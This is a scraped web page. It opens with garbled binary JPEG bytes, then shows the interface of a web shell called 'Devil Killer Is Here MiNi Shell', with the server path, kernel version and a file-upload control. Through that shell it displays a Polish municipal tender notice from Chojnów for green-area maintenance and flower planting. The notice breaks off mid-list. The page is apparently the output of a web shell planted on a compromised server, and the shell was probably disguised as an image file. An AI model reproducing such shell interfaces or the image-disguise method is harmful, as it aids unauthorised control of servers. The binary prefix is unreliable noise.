JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210402/0002754601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00027546 z dnia 2021-04-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Utrzymanie terenów zielonych oraz wykonanie nasadzeń roślin na terenie miasta Chojnowa w terminie do dnia 30.11.2021 r.”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA CHOJNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647446</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Zamkowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chojnów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-225</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768188285</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">768187515</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad.miejski@chojnow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chojnow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Utrzymanie terenów zielonych oraz wykonanie nasadzeń roślin na terenie miasta Chojnowa w terminie do dnia 30.11.2021 r.”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4531095d-938f-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00027546</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003996/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Utrzymanie terenów zielonych na terenie miasta</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://chojnow.eu/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://chojnow.eu/, https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: urzad.miejski@chojnow.eu,um.sekretariat@chojnow.eu2. Zamawiający wyznacza następujące osobydo kontaktu z Wykonawcami: Magdalena Sawicz-Citkowska, tel. 76 81 86 681, email:urzad.miejski@chojnow.eu, um.sekretariat@chojnow.eu3. Wykonawca zamierzający wziąć udziałw postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawcaposiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany,wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.4. Wymagania techniczne iorganizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych odwzorowańdokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały wRegulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformyusług administracji publicznej (ePUAP). 5. Maksymalny rozmiar plików przesyłanych za pośrednictwemdedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularzado komunikacji” wynosi 150 MB. 6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentówelektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń oraz innychinformacji przyjmuje się datę ich przekazania na ePUAP. 7. Sposób sporządzenia dokumentówelektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa RadyMinistrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji orazwymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) orazrozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawiepodmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: - administratorem Pani/Pana danych osobowych jestGmina Miejska Chojnów, kontakt mailowy pod adresem: ido@chojnow.eu, - Pani/Pana dane osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. cRODOw celu związanym z postępowaniem oudzielenie zamówienia publicznego RG.271.6.2021 do postępowania o zamówienie publiczneprowadzonego w trybie podstawowym przetargu nr RG.271.4.2021 pn.: „Utrzymanie terenów zielonychoraz wykonanie nasadzeń roślin na terenie miasta Chojnowa w terminie do dnia 30.11.2021r.”,oświadczam, co następuje:􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy zdnia 11września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej„ustawa Pzp”; - Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwaniaumowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawyPzp; - w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposóbzautomatyzowany, stosowanie do art. 22 RODO;- posiada Pani/Pan:− na podstawie art. 15 RODOprawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo dosprostowania lub uzupełnienia Pani/Pana danych osobowych *;− na podstawie art. 18 RODO prawożądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO **; − prawo do wniesienia skargi do PrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowychPani/Pana dotyczących narusza przepisy RODO; - nie przysługuje Pani/Panu:− w związku z art. 17ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danychosobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danychosobowych jest art. 6 ust. 1 lit. c RODO.- Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. - Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art.14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. Więcej - załącznik nr 5 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia - Utrzymanie terenów zielonych miasta Chojnowa w terminie do 30.11.2021 r. zgodnie z wykazem prac.I.	Zakres prac do wykonania na rabatach w gazonach i trawnikach:1.	Bieżące grabienie trawników (z gałęzi, śmieci i liści)Nr terenu zielonego:1) Pl. Zamkowy - 2477	m²2) Pl. Konstytucji 3 Maja - 1506	m²3) Pl. Dworcowy - 348	m²4) Pl. Wogezów - 1355	m²5) ul. Złotoryjska - 1361	m²6) ul. Parkowa - Złotoryjska - 2132	m²7) ul. Dąbrowskiego - Grottgera - 1466	m²8) ul. Dąbrowskiego (przy Kościele) - 460	m²9) ul. Legnicka - 2672	m²10) ul. Paderewskiego - 4590	m²11) ul. Chmielna - Piotra Skargi - 3204	m²12) ul. Kolejowa - 413	m²14) ul. Kopernika - 282	m²15) ul. Reja - 4909	m²18) ul. Chrobrego - 687	m²19) ul. Łokietka + skarpa (ul. Łokietka – ul. Kilińskiego) - 55	m²20) ul. Wojska Polskiego - 131	m²21) ul. Kilińskiego - 493	m²34) ul. Szpitalna - 459	m²35) ul. Lubińska – Przelot i Goleszańska/Legnicka	- 680	m²36) ul. Fabryczna (rejon parkingu) - 321	m²36) ul. Fabryczna (rejon wjazdu do stacji paliw) - 225	m²37) Pl. Bolesława Prusa - 83	m²39) ul. Kilińskiego - 44	m²(rejon ul. Skłodowskiej-ul. Łokietka) 40) ul. Dąbrowskiego (Bank Zachodni) - 332	m²41) ul. Bolesławiecka 14 - 453	m²53) ul. Kościuszki, Witosa (kwartał) - 3170	m²55) ul. Legnicka – przy moście:- prawa strona od PUB - 245	m2 - lewa strona od ul. Żeromskiego - 758	m²56) ul. Drzymały (ogród zabaw) - 600	m257) ul. Wolności –Królowej Jadwigi - 360 m² Razem - 36 271 m22.	Grabienie trawników i alejek jesienią z wszystkich opadłych liści, w przypadku liści kasztanowca ich zniszczenie.3.	Bieżące zamiatanie alejek na terenach zielonych . Powierzchnia alejek zlokalizowanych w rejonie terenów zielonych:1)Pl. Konstytucji 3 – Maja - 381 m²2) Dąbrowskiego – Grottgera - 306 m²3) ul. Parkowa - 271 m²4) Pl. Wogezów - 495 m²5) ul. Paderewskiego - 246 m²6) ul. Reja – Gimnazjum Nr 2 - 114 m²7) Pl. Zamkowy - 234 m²8) ul. Chmielna – P. Skargi - 219 m² Razem - 2 266 m24.	Zbieranie i wywożenie nieczystości z terenów zielonych, opróżnianie koszy ulicznych zlokalizowanych na terenach zielonych oraz wywóz nieczystości wraz ze składowaniem - nie dopuszcza się zalegania śmieci na terenach zieleni oraz w koszach na śmieci.5.	Czyszczenie z trawy obrzeży chodników, ulic oraz placów zlokalizowanych bezpośrednio przy terenach zielonych.6.	Wygrabianie alejek ziemnych.7.	Przekopywanie kwietników na zimę. Zabezpieczenie wrażliwych roślin na zimę naturalnym materiałem np. stroiszem, liśćmi, poprzez kopczykowanie, itp. 8.	Przygotowanie gleby do sadzenia roślin. Wymiana ziemi w gazonach oraz uzupełnienie ziemi na rabatach. 9.	Pielenie posadzonych roślin, w tym roślin nasadzonych w donicach oraz usuwanie obumarłych kwiatostanów. 10.	Podlewanie posadzonych roślin na rabatach i w (donicach) gazonach:- ul. Dąbrowskiego - Grottgera,- ul. Chmielna - P. Skargi, - ul. Parkowa - Złotoryjska,- ul. Kolejowa,- pl. Konstytucji 3 - Maja, - ul. Wolności - Park Śródmiejski- pl. Dworcowy,- pl. Wogezów,11.	Cięcie żywopłotów ze zgrabianiem pędów: - ul. Kościuszki - 94 mb- ul. Legnicka - 172	mb- pl. Konstytucji 3 – Maja - 70 mb- ul. Paderewskiego - 361	mb- ul. Złotoryjska - 43 mb- ul. Bolesławiecka - 61 mb- pl. Zamkowy - 130 mb- pl. Dworcowy - 62 mb- ul. Lubińska - 228	mb- ul. Złotoryjska – Chmielna - 15 mbRazem - 1 236 mb12.	Odmładzanie żywopłotów z ligustra- (1 x w roku), na wysokość ok. 30-50 cm.13.	Bieżące odchwaszczanie żywopłotów. 14.	Uzupełnianie obumarłych roślin oraz luk na rabatach, 15.	Oprócz bieżącego grabienia Wykonawca w dniu 30.11.2021 r. zgrabi i wywiezienie liście z terenów objętych pielęgnacją. 16.	Wypłacenie ostatniej faktury będzie możliwe po protokolarnym odbiorze prawidłowo wykonanych prac, tj. w dniu odbioru tereny zieleni muszą być m.in. wykoszone, pograbione, pozamiatane i posprzątane z zalegających liści, śmieci, itp.II.	Koszenie trawników1.	Koszenie trawników na wskazanych niżej terenach zielonych.Nr terenu zielonego:1) Pl. Zamkowy - 2477 m²2) Pl. Konstytucji 3 Maja - 1506 m²3) Pl. Dworcowy - 348 m²4) Pl. Wogezów - 1355 m²5) ul. Złotoryjska - 1361 m²6) ul. Parkowa - Złotoryjska - 2132 m²7) ul. Dąbrowskiego - Grottgera - 1466 m²8) ul. Dąbrowskiego (przy Kościele) - 460 m²9) ul. Legnicka - 2672 m²10) ul. Paderewskiego - 4523 m²11) ul. Chmielna - Piotra Skargi - 3429 m²12) ul. Kolejowa - 413 m²14) ul. Kopernika - 282 m²15) ul. Reja - 4909 m²18) ul. Chrobrego - 687 m²19) ul. Łokietka +skarpa (ul. Łokietka-ul. Kilinskiego) - 75 m² 20) ul. Wojska Polskiego - 131 m²21) ul. Kilińskiego - 493	m²34) ul. Szpitalna - 459 m²35) ul. Lubińska – Przelot i Goleszańska/Legnicka	- 680 m²36) ul. Fabryczna (rejon parkingu) - 321 m²36) ul. Fabryczna (rejon wjazdu do stacji paliw) - 225 m²37) Pl. Bolesława Prusa - 83 m²39) ul. Kilińskiego - 44 m²(rejon ul. Skłodowskiej-ul. Łokietka) 40) ul. Dąbrowskiego (Bank Zachodni) - 332 m²41) ul. Bolesławiecka 14 - 453 m²53) ul. Kościuszki, Witosa (kwartał) - 3170 m²55) ul. Legnicka – przy moście:- prawa strona od PUB - 245	m2 - lewa strona od ul. Żeromskiego -758 m²56) ul. Drzymały (ogród zabaw) - 600	m257) ul. Wolności – Królowej Jadwigi - 360 m² Razem - 36 271 m2 2.	Wysokość trawy nie może przekraczać 10 cm.3.	Zgrabienie skoszonej trawy wraz z jej wywiezieniem do kompostowni, bezpośrednio po koszeniu. Nie dopuszcza się zalegania skoszonej trawy do dnia następnego. 4.	Posprzątanie alejek, chodników itp. znajdujących się bezpośrednio przy trawnikach ze świeżo skoszonej trawy.5.	Wykonawca zachowa szczególną ostrożność przy koszeniu, aby nie uszkodzić mienia osób trzecich np. samochodów, elementów małej architektury, słupów oświetlenia itp.6. Za wszelkie uszkodzenia odpowiada Wykonawca. III.	Pozostałe prace do wykonania1.	Malowanie oraz naprawa ustawianych ławek w rejonie terenów zielonych:- ul. Paderewskiego - 19 szt.- pl. Dworcowy - 10 szt.- pl. Zielony przy ul. Dąbrowskiego – Grottgera - 13 szt.- pl. Zamkowy - 2 szt.- pl. Wogezów - 10 szt.- pl. Konstytucji 3 – Maja - 3	szt.- ul. Łokietka, Maczka, Sikorskiego - 4 szt.Razem: - 61 szt.2.	Malowanie oraz naprawa koszy ulicznych na śmieci ustawianych w rejonie terenów zielonych:- ul. Paderewskiego - 10 szt.- pl. Konstytucji 3 - Maja - 4 szt.- pl. Zielony przy ul. Dąbrowskiego – Grottgera - 2 szt.- pl. Zamkowy - l szt.- ul. Łokietka, Maczka, Sikorskiego - 8 szt.- pl. Dworcowy - 1 szt.- ul. Kolejowa - 9 szt.- pl. Wogezów - 3 szt. Razem - 38 szt.Wskazanie terenów do koszenia i grabienia zawiera Załącznik nr 2A do umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin zapłaty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia – Sadzenie roślin oraz utrzymanie terenów zieleni miasta Chojnowa w terminie od zawarcia umowy do 30.11.2021r. zgodnie z wykazem prac1. Do dnia 30 maja 2021 r. posadzenie na rabatach kwiatów z materiałów Wykonawcy (kwiaty kwitnące) w następującej lokalizacji:1). ul. Chmielna – Piotra Skargi: średnica rabaty: obwód rabaty:I – rabata obok Banku PKO Bank Polski S.A. 62m² 8,90 28 mII – rabata 35 m² 6,70 21 mIII – rabata 22 m² 5,30 16 mIV – rabata 22 m² 5,30 16 mV – rabata 22 m² 5,30 16 mVI – rabata 20 m² 5,10 16 mVII – rabata 11,30 m² 3,80 12 mVIII – rabata 17,30 m² 4,70 15 mIX – rabata 21,20 m² 5,20 16 mX – rabata 20,40m² 2,10 16 m2) pozostałe rabaty:I – plac Zamkowy 12,40m² 16 mII – plac Konstytucji 3 Maja 10,30m² 8 mIII – plac Dworcowy 17,70m² 20 mIV – plac Wogezów 8,00 m² 12 mV – ul. Parkowa – Złotoryjska 89,00 m² 42 mVI – Szpitalna 8,80 m² 25 m Łączna powierzchnia rabat wynosi 399,40 m², łączny obwód rabat wynosi 295 m, na których należy posadzić 3.450 sztuk pelargonii w trzech różnych kolorach oraz 1.600 sztuk roślin z gatunku starzec popielaty. 2. Posadzenie kwiatów kwitnących w gazonach, donicach z materiałów Wykonawcy: 1) do dnia 28 kwietnia 2021 r. należy posadzić bratki ogrodowe w 10 donicach o powierzchni 1,00m² każda oraz w 6 donicach o pow. 0,8m² każda, łącznie 500 szt. 